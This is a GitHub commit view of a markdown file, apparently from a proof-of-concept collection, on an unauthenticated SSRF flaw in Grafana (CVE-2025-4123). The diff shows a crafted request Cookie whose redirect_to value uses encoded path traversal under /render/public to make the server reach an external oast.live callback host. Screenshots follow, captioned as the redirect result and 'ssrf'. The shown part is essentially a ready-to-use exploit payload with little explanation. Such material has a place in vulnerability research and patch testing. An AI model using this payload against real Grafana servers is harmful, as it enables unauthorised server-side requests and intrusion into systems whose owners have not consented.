Update Grafana存在未授权SSRF漏洞(CVE-2025-4123).md

This commit is contained in:
Rainyseason 2025-06-11 14:55:10 +08:00 committed by GitHub
parent 29605996af
commit c7878234a7
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194

View File

@ -19,3 +19,10 @@ Connection: close
Cookie: redirect_to=%2Frender%2Fpublic%2F..%25252f%25255Cd0nt31pu8bl7cn5ncca08sg68smps8h39.oast.live%25252f%25253F%25252f..%25252f..
Accept-Encoding: gzip
```
<img width="847" alt="1749624867787" src="https://github.com/user-attachments/assets/e41c2152-38a2-49ca-a21b-f99a23a4a567" />
跟随重定向后 重定向数据
<img width="948" alt="1749624883551" src="https://github.com/user-attachments/assets/fb55bccf-853f-4773-810b-3c91580089a8" />
ssrf
<img width="878" alt="1749624901460" src="https://github.com/user-attachments/assets/82c6ee4a-4165-4245-9f23-8129af9b6ed3" />